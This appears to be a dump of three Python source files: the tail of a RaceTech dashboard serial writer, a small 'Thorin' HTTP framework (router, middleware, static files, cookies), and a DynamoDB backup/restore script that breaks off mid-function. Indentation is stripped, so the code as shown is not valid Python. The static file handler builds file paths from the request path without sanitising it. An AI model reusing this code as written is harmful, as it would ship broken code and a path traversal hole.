def write_to_dash(header,length,msg,cs,variable_length,decode_function,name):
# print header,length,msg,cs
# print name, decode_function(msg)
out_bytes = chr(header)
if variable_length:
out_bytes += chr(length)
for b in msg:
out_bytes += chr(b)
out_bytes += chr(cs)
dash.write(out_bytes)
RT = rt.RaceTech(ecu)
RT.run(write_to_dash)
|
server.py
|
import time
import json
import cgi
import threading
import os.path
import re
import sys
import logging
import lesscpy
from six import StringIO
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from http.cookies import SimpleCookie
from urllib.parse import unquote, quote
def get_cookies(headers):
"""
Convert cookies string to dict
"""
cookies_res = {}
try:
cookies = headers['Cookie'].split(';')
for cookie in cookies:
c = cookie.split('=')
cookies_res[c[0].strip()] = unquote(c[1].strip())
except Exception as e:
logging.debug('get_cookies() %s' % e)
return cookies_res
def get_params(path):
"""
Convert params from path to dict
ex: '?page=1&language=en' to dict
"""
query_res = {}
if path.find('?') != -1:
query = path[path.find('?')+1:]
if query.find('&') != -1:
query_arr = query.split('&')
for q in query_arr:
v = q.split('=')
if len(v) == 2:
query_res[v[0].strip()] = unquote(v[1].strip())
else:
v = query.split('=')
if len(v) == 2:
query_res[v[0].strip()] = unquote(v[1].strip())
return query_res
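# --- Added illustration (not part of the original file) ---
# Shows the dict shapes produced by the two helpers above; defined as an unused
# function so importing the module stays side-effect free.
def _demo_request_parsing():
    assert get_params('/events?page=1&language=en') == {'page': '1', 'language': 'en'}
    assert get_cookies({'Cookie': 'session=abc123; lang=en'}) == {'session': 'abc123', 'lang': 'en'}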
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
request_queue_size = 1000
class Middleware:
"""
Singleton
Abstract layer between request and custom handler
For example:
protect only auth page, ddos, add some data (like BEFORE REQUEST)
"""
def __init__(self):
self.middlewares = []
def add(self, class_obj):
self.middlewares.append(class_obj)
def use(self, req):
req_result = req
for m in self.middlewares:
req_result = m(req_result)
if not req_result:
break
return req_result
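# --- Added illustration (not part of the original framework) ---
# A middleware receives the request object and returns it (possibly modified) to
# let processing continue, or None to block it. When a middleware listed on a
# route returns None, Router.use_middlewares() replies with a 403. The cookie
# name below is hypothetical.
def example_auth_middleware(req):
    if req and 'session' not in req.cookies:
        return None  # block the request: no session cookie present
    return req
# per-route:  thorinService.add_route('GET', '/admin', SomeController, 'admin', [example_auth_middleware])
# global:     middleware.add(example_auth_middleware)
# (both singletons are created at the bottom of this file)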
class StaticContentHandler:
"""
Return static files: js, css, images
CSS: By default StaticContentHandler using LESS, but you can use raw css
this class can handle css files like some.css and less like some.less
(prod mode) less files are cached after the first call and kept in memory while Thorin is running.
(dev mode) less files are reloaded on each request.
you can use GULP, GRUNT or another build system to merge and create less, styl, jade or something else.
"""
def __init__(self, req):
self.req = req
mimetype_res = self.mimetype()
if mimetype_res['send_reply']:
try:
ext_list = ['jpg', 'gif', 'png']
if mimetype_res['mimetype'] == 'text/css':
content = self.css()
if not content:
raise IOError
else:
if any(mimetype_res['mimetype'].find(ext) != -1 for ext in ext_list):
f = open('.'+self.req.path, 'rb')
else:
f = open('.'+self.req.path)
content = f.read()
f.close()
self.req.send_response(200)
self.req.send_header("Content-type", mimetype_res['mimetype'])
self.req.end_headers()
if any(mimetype_res['mimetype'].find(ext) != -1 for ext in ext_list):
self.req.wfile.write(content)
else:
self.req.wfile.write(bytes(content, "utf-8"))
except IOError:
self.req.send_error(404)
else:
self.req.send_error(404)
def css(self):
content = None
path = '.'+self.req.path
if os.path.isfile(path):
f = open(path)
content = f.read()
f.close()
else:
path = re.sub(r'(\.css)', '.less', path, flags=re.IGNORECASE)
if os.path.isfile(path):
f = open(path)
f_content = f.read()
f.close()
for l in thorinService.less_list:
if l['path'] == path:
content = l['css']
break
if not content:
content = lesscpy.compile(StringIO(f_content), minify=True)
if thorinService.env.get('location') and thorinService.env['location'] == 'prod':
thorinService.less_list.append({
'path': path,
'css': content
})
return content
def mimetype(self):
mimetype = 'text/plain'
send_reply = False
if self.req.path.endswith(".html"):
mimetype = 'text/html'
send_reply = True
if self.req.path.endswith(".jpg"):
mimetype = 'image/jpg'
send_reply = True
if self.req.path.endswith(".gif"):
mimetype = 'image/gif'
send_reply = True
if self.req.path.endswith(".png"):
mimetype = 'image/png'
send_reply = True
if self.req.path.endswith(".js"):
mimetype = 'application/javascript'
send_reply = True
if self.req.path.endswith(".css"):
mimetype = 'text/css'
send_reply = True
return {
'mimetype': mimetype,
'send_reply': send_reply
}
class Router:
"""
Singleton
Router can handle http requests like this:
GET /user/:id # in req.params you can get user_id req.params['id']
GET /user/:id? # if you add "?" this param optional
POST /event/create
PUT /events/type/:type?/page/:page you can use optional param anywhere
Inspired by the expressjs (nodejs) framework, which uses a similar format
"""
def __init__(self):
self.routes = []
def add(self, method, path, handler, action, middleware = None):
self.routes.append({
'path': path, # route path. Ex. /user/:id
'method': method, # GET, POST, etc
'handler': handler, # controller name. Ex. IndexController
'action': action, # method name of controller (string), 'get_user'
'middleware': middleware # method or function in list. Ex. [IndexController.is_user_auth]
})
def show_error_page(self, req, code):
req.send_response(code)
req.send_header("Content-type", "text/html")
req.end_headers()
try:
f = open(thorinService.error_folder+'/'+str(code)+'.html')
html = f.read()
req.wfile.write(bytes(html, "utf-8"))
f.close()
except:
pass
def get_params(self, path, route_path):
"""
get all values from path
return dict { param_name: value, ... }
"""
def get_clean_key(key):
return re.sub(r'\?', '', key).strip()
params = {}
path = re.sub(':', ':', path)
path_list = path.split('/')
route_path_list = route_path.split('/')
index = 0
for r in route_path_list:
if r.find(':') != -1:
key = get_clean_key(r[1:])
try:
params[key] = path_list[index]
except IndexError:
pass
index += 1
return params
def is_param_in_another_route(self, index, param):
res = False
for r in self.routes:
try:
path = r['path'].split('/')
if path[index] == param:
res = True
break
except:
pass
return res
def get_current_route(self, req):
""" find and get current route """
current_route = None
params = {}
req.path = re.sub('\:', ':', req.path)
if len(req.path) > 1 and req.path[-1:] == '/':
req.path = req.path[:-1]
for route in self.routes:
found = True
# if route equal path (doesn`t has params in route)
if req.path == route['path'] and req.command == route['method']:
current_route = route
break
# if route has params
elif ':' in route['path']:
route_path = route['path'].split('/')
req_path = req.path.split('/')
req_path_index = 0
for route_param in route_path:
try:
# route has optional param
if '?' in route_param:
continue
elif route_param != req_path[req_path_index]:
if ':' not in route_param:
found = False
break
else:
if self.is_param_in_another_route(req_path_index, req_path[req_path_index]):
found = False
break
req_path_index += 1
except Exception as e:
logging.debug('Route error %s' % e)
found = False
break
# found route and method(get,post,etc)
if found and req.command == route['method']:
current_route = route
break
if current_route:
logging.debug('current_route %s %s' % (current_route, req.path))
params = self.get_params(req.path, current_route['path'])
return {
'route': current_route,
'params': params
}
def use_middlewares(self, req, original_req, current_route):
"""
start current middleware
main feature - if the request is None after executing a middleware,
the route is protected and we send a 403 error to the client
"""
protected = False
for mid in current_route['middleware']:
req = mid(req)
if not req:
protected = True
break
if not protected:
r = current_route['handler'](req)
getattr(r, current_route['action'])()
else:
self.show_error_page(original_req, 403)
def start_handler(self, req):
if not req:
return None
# save original request
# if middleware return None our request be overrided
original_req = req
current_route = self.get_current_route(req)
if current_route['route']:
req.params = current_route['params']
if not current_route['route']['middleware']:
r = current_route['route']['handler'](req)
getattr(r, current_route['route']['action'])()
else:
self.use_middlewares(req, original_req, current_route['route'])
else:
self.show_error_page(original_req, 404)
def handler(self, req):
"""
first method called from MainHandler class.
we create a new thread to process the client request.
each request gets its own thread.
"""
t = threading.Thread(target=self.start_handler, args=(req,))
t.start()
# forward processed request
t.join()
class MainHandler(BaseHTTPRequestHandler):
""" Using BaseHTTPRequestHandler from default Python3 box """
def __init__(self, request, client_address, server):
"""
override default baseHTTP info
add some variables like: cookies, query, path, etc.
"""
self.server_version = 'Thorin/1.0.3'
self.request_version = 'HTTP/1.1'
self.sys_version = ''
self.response_time = time.time()
self.cookies = {}
self.query = {}
self.path = {}
self.remote_ip = ''
BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def add_request_data(self, s):
# Get real ip from headers
if s.headers.get(thorinService.remote_real_ip_header):
s.remote_ip = s.headers[thorinService.remote_real_ip_header]
# Convert cookies to dict
s.cookies = get_cookies(s.headers)
# Convert params to dict
s.query = get_params(s.path)
# Remove params from request path.
# Because we want get clear path. Then we define path in routes
if s.path.find('?') != -1:
s.path = s.path[0:s.path.find('?')]
def do_GET(self):
self.add_request_data(self)
# if this static folder. Call StaticContentHandler
if self.path.find(thorinService.static_folder) == 0:
StaticContentHandler(self)
else:
router.handler(middleware.use(self))
def do_POST(self):
self.add_request_data(self)
router.handler(middleware.use(self))
def do_PUT(self):
self.add_request_data(self)
router.handler(middleware.use(self))
def do_PATCH(self):
self.add_request_data(self)
router.handler(middleware.use(self))
def do_DELETE(self):
self.add_request_data(self)
router.handler(middleware.use(self))
def log_message(self, format, *args):
self.response_time = round(time.time() - self.response_time, 3)
logging.info('%s - [%s] %s - %sms' % (self.remote_ip, self.log_date_time_string(), format%args, self.response_time))
class ThorinServer:
""" Main Init Server Class """
def __init__(self):
self.my_server = None
def start(self, host_name='localhost', port_number='9000'):
""" start listen host:port """
self.host_name = host_name
self.port_number = port_number
# start threaded server. Each request processing by new thread.
# start MainHandler class
self.my_server = ThreadedHTTPServer((self.host_name, self.port_number), MainHandler)
logging.info("%s Server Starts - %s:%s" % (time.asctime(), self.host_name, self.port_number))
try:
self.my_server.serve_forever()
except KeyboardInterrupt:
pass
self.my_server.server_close()
logging.info("%s Server Stops - %s:%s" % (time.asctime(), self.host_name, self.port_number))
class ThorinUtils:
"""
this class extend custom controllers
like this:
class IndexController(ThorinUtils):
def __init__(self):
...
...
ThorinUtils can:
post_data - return post data from forms, POST ajax, etc.
send - return template with data, json format or text/html, etc.
redirect - redirct user to another page
set_cookie - set cookie :)
remove_cookie - delete cookie :)
"""
def __init__(self, req):
self.req = req
self.cookies_list = []
def post_data(self):
""" post_data return data from Forms, post ajax, etc """
form = cgi.FieldStorage(
fp=self.req.rfile,
headers=self.req.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.req.headers['Content-Type'],
}
)
return form
def send(self, data={}, code=200, content_type='text/html', path_to_template=''):
""" send data with template to client or send text/html, application/json """
# send cookies
self.req.send_response(code)
self.req.send_header("Content-type", content_type)
for c in self.cookies_list:
self.req.send_header('Set-Cookie', c.output(header=''))
self.req.end_headers()
try:
if content_type == 'text/html':
# if you connect templater Jinga2 or another
if thorinService.t_engine and thorinService.t_engine_render:
# static_data holds environment variables, paths to css, js, etc
data['static_data'] = thorinService.static_data
# Access to cookies. You can use the cookie variables in the template
data['cookies'] = self.req.cookies
# Access to params. All passed params are available in the template
data['params'] = self.req.params
result_data = thorinService.t_engine_render(path_to_template, data)
self.req.wfile.write(bytes(result_data, "utf-8"))
else:
# send raw text/html data
# example: '<b>hello</b>'
self.req.wfile.write(bytes(data, "utf-8"))
elif content_type == 'application/json':
# send json string to client
json_str = json.dumps(data, ensure_ascii=False)
self.req.wfile.write(bytes(json_str, "utf-8"))
except BrokenPipeError as e:
print('########################################')
logging.debug('BrokenPipeError. Connection was broken. %s' % e)
def redirect(self, url):
""" redirect to another page """
self.req.send_response(301)
for c in self.cookies_list:
self.req.send_header('Set-Cookie', c.output(header=''))
self.req.send_header('Location', url)
self.req.end_headers()
def set_cookie(self, name, value, path='/', expires='Wed, 13 Jan 2020 10:00:00 GMT'):
""" set cookie with SimpleCookie() standart python3 class """
c = SimpleCookie()
c[name] = quote(value)
c[name]['path'] = path
c[name]['expires'] = expires
self.cookies_list.append(c)
def remove_cookie(self, name):
c = SimpleCookie()
c[name] = 'deleted'
c[name]['expires'] = 'Thu, 01 Jan 1970 00:00:00 GMT'
self.cookies_list.append(c)
class ThorinService:
"""
Singleton
wrapper for creating middlewares and routes
storage for db connection, env variables, path to static folder, etc
"""
def __init__(self):
# you can save all env right here or use self.glob
self.env = {}
# default language project
self.lang = 'ru'
# database dict. You can create many different links to DB
# example:
# thorinSerivce.db['mysql'] = connect_to_mysql()
# thorinSerivce.db['mongo'] = connect_to_mongo()
self.db = {}
# if you are running behind Nginx you should pass through the real user ip.
# nginx directive which is responsible for the ip address:
# proxy_set_header X-Real-IP $remote_addr;
# Why "X-Real-IP"? I don't know. I took this a long time ago from a stackoverflow discussion
self.remote_real_ip_header = 'X-Real-IP'
# you can set any variable in dict static_data
self.static_data = {
'domain': ''
}
# storage for global variables
# project serphi.com stores there cached events, prices, etc
self.glob = {}
# path to static folder (js, css, fonts)
self.static_folder = '/static'
# template engine
self.t_engine = None
# template engine render
self.t_engine_render = None
# less (css) files list
self.less_list = []
# error folder
# example: 404.html, 502.html, etc
self.error_folder = './templates/errors'
# settings for cookies
self.cookies = {
'httpOnly': True,
'Secure': False
}
# wrapper to add middleware
def add_middleware(self, class_obj):
middleware.add(class_obj)
# wrapper to add route
def add_route(self, method, path, handler, action, middleware = None):
router.add(method, path, handler, action, middleware)
router = Router()
middleware = Middleware()
thorinService = ThorinService()
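# --- Added illustration (not part of the original framework) ---
# A hypothetical controller wired to the router, following the Router and
# ThorinUtils docstrings above: the handler is a ThorinUtils subclass, the action
# is the method name as a string, and path params end up in req.params.
class ExampleController(ThorinUtils):
    def home(self):
        # render templates/index.html (the template path is hypothetical)
        self.send({'title': 'Hello'}, path_to_template='index.html')

    def get_user(self):
        self.send({'user_id': self.req.params.get('id')}, content_type='application/json')

# thorinService.add_route('GET', '/', ExampleController, 'home')
# thorinService.add_route('GET', '/user/:id', ExampleController, 'get_user')
# ThorinServer().start('localhost', 9000)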
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with DynamoDB Local).
"""
import argparse
import boto3
import datetime
import errno
import fnmatch
import json
import logging
import os
import re
import shutil
import sys
import tarfile
import threading
import time
import zipfile
from queue import Queue
from six.moves import input
from urllib.error import URLError, HTTPError
from urllib.request import urlopen
AWS_SLEEP_INTERVAL = 10 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
DATA_DIR = "data"
DATA_DUMP = "dump"
DEFAULT_PREFIX_SEPARATOR = "-"
CURRENT_WORKING_DIR = os.getcwd()
JSON_INDENT = 2
LOCAL_REGION = "local"
LOCAL_SLEEP_INTERVAL = 1 # seconds
LOG_LEVEL = "INFO"
MAX_BATCH_WRITE = 25 # DynamoDB limit
MAX_NUMBER_BACKUP_WORKERS = 25
MAX_RETRY = 6
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
RESTORE_WRITE_CAPACITY = 25
RESTORE_READ_CAPACITY = 25
SCHEMA_FILE = "schema.json"
THREAD_START_DELAY = 1 # seconds
json.JSONEncoder.default = lambda self, obj: (
obj.isoformat() if isinstance(obj, datetime.datetime) else None
)
def _get_aws_client(
service: str,
profile: str = None,
region: str = None,
secret_key: str = None,
access_key: str = None,
):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = (
urlopen(
METADATA_URL + "placement/availability-zone", data=None, timeout=5
)
.read()
.decode()
)
aws_region = azone[:-1]
except HTTPError as e:
logging.exception(
"Error determining region used for AWS client. Typo in code?\n\n"
+ str(e)
)
sys.exit(1)
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
if profile:
session = boto3.Session(
profile_name=profile,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(
service,
region_name=aws_region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
return client
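# --- Added illustration (not part of the original script) ---
# A hedged sketch of using the helper above: build a DynamoDB client and page
# through table names, mirroring what get_table_name_by_tag() does below. The
# region value is hypothetical; omit it to fall back to AWS_DEFAULT_REGION or
# instance metadata.
def _demo_list_tables():
    dynamo = _get_aws_client(service="dynamodb", region="us-east-1")
    names = []
    for page in dynamo.get_paginator("list_tables").paginate():
        names.extend(page["TableNames"])
    return names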
def get_table_name_by_tag(profile, region, tag):
"""
Using the provided profile, region and tag, return all tables that carry the tag.
The profile is also used, when needed, to build the connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile=profile, region=region, service="sts")
dynamo = _get_aws_client(profile=profile, region=region, service="dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator(operation_name="list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(
region, account_number, table
)
table_tags = dynamo.list_tags_of_resource(ResourceArn=table_arn)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(
bucket_object,
bucket,
bucket_object,
ExtraArgs={"ServerSideEncryption": "AES256"},
)
except s3.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(Bucket=bucket)
except s3.exceptions.ClientError as e:
logging.exception(
"S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e)
)
sys.exit(1)
try:
contents = s3.list_objects_v2(Bucket=bucket, Prefix=args.dumpPath)
except s3.exceptions.ClientError as e:
logging.exception(
"Issue listing contents of bucket " + bucket + "\n\n" + str(e)
)
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception(
"Unable to find file to restore from. "
"Confirm the name of the table you're restoring."
)
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception(
"compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e)
)
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception(
"Zip file would be too large. Update code to use Zip64 to continue."
)
sys.exit(1)
else:
logging.error(
"Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file"
)
return False, None
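# Illustrative usage sketch ("dump" is a hypothetical dump directory created by
# do_backup()): the return value is a (created, archive_path) pair consumed by main().
#   do_archive("tar", "dump")   # -> (True, "dump.tar.bz2")
#   do_archive("zip", "dump")   # -> (True, "dump.zip")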
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
optional_args = {}
if last_evaluated_table_name is not None:
optional_args["ExclusiveStartTableName"] = last_evaluated_table_name
table_list = conn.list_tables(**optional_args)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
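# Illustrative sketch (hypothetical table names): with tables
# ["prod-users", "prod-orders", "staging-users"] in the account,
#   get_table_name_matches(conn, "prod*", "-")   # -> ["prod-users", "prod-orders"]
# Note the separator argument is accepted for symmetry with
# get_restore_table_matches() but is not used by the fnmatch above.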
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info(
'Cannot find "./%s", now trying user-provided absolute dump path..'
% args.dumpPath
)
try:
dir_list = os.listdir(args.dumpPath)
except OSError:
logging.info(
'Cannot find "%s", now trying current working directory..'
% args.dumpPath
)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info(
'Cannot find "%s" directory containing dump files!' % dump_data_path
)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(
re.sub(
r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]
).split()[0]
):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(
r"([A-Z])", r" \1", source_table_name
).split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
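# Worked examples (hypothetical names) of the prefix rewrite above:
#   change_prefix("prod-users", "prod*", "staging*", "-")   # -> "staging-users"
#   change_prefix("prodUsers", "prod*", "staging*", "")     # -> "stagingUsers"
# With an empty separator the camelCase split via re.sub() is used instead of
# splitting on the separator character.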
def delete_table(conn, sleep_interval: int, table_name: str):
"""
Delete table table_name
"""
if not args.dataOnly:
if not args.noConfirm:
confirmation = input(
"About to delete table {}. Type 'yes' to continue: ".format(table_name)
)
if confirmation != "yes":
logging.warning("Confirmation not received. Stopping.")
sys.exit(1)
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(TableName=table_name)
except conn.exceptions.ResourceNotFoundException:
table_exist = False
logging.info(table_name + " table deleted!")
break
except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying deletion of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying deletion of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceInUseException:
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info(
"Waiting for "
+ table_name
+ " table to be deleted.. ["
+ conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceNotFoundException:
logging.info(table_name + " table deleted.")
pass
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(RequestItems=request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(
str(len(unprocessed_items))
+ " unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY))
)
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info(
"Max retries reached, failed to processed batch write: "
+ json.dumps(unprocessed_items, indent=JSON_INDENT)
)
logging.info("Ignoring and continuing..")
break
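# Illustrative sketch (hypothetical table and attribute names) of the payload
# batch_write() expects: items in the low-level DynamoDB attribute-value format,
# exactly as they appear in the scan pages written out during backup.
#   put_requests = [
#       {"PutRequest": {"Item": {"id": {"S": "1"}, "name": {"S": "alice"}}}},
#       {"PutRequest": {"Item": {"id": {"S": "2"}, "name": {"S": "bob"}}}},
#   ]
#   batch_write(conn, BATCH_WRITE_SLEEP_INTERVAL, "my-table", put_requests)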
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be in the desired state
"""
while True:
if (
conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
!= "ACTIVE"
):
logging.info(
"Waiting for "
+ table_name
+ " table to be "
+ verb
+ ".. ["
+ conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(
conn, table_name, read_capacity, write_capacity, wait=True
):
"""
Update provisioned throughput on the table to provided values
"""
logging.info(
"Updating "
+ table_name
+ " table read capacity to: "
+ str(read_capacity)
+ ", write capacity to: "
+ str(write_capacity)
)
while True:
try:
conn.update_table(
TableName=table_name,
ProvisionedThroughput={
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
},
)
break
except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput"
"of " + table_name + ".."
)
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
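# Illustrative usage sketch (hypothetical table name and capacities): raise read
# capacity before a full-table scan, then revert it afterwards without blocking.
#   update_provisioned_throughput(conn, "my-table", 100, 25)            # waits for ACTIVE
#   update_provisioned_throughput(conn, "my-table", 5, 25, wait=False)  # fire and forget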
def do_empty(dynamo, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(TableName=table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
optional_args = {}
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = table_global_secondary_indexes
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_name,
KeySchema=table_key_schema,
ProvisionedThroughput=table_provisioned_throughput,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying creation of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info(
"Recreation of "
+ table_name
+ " completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
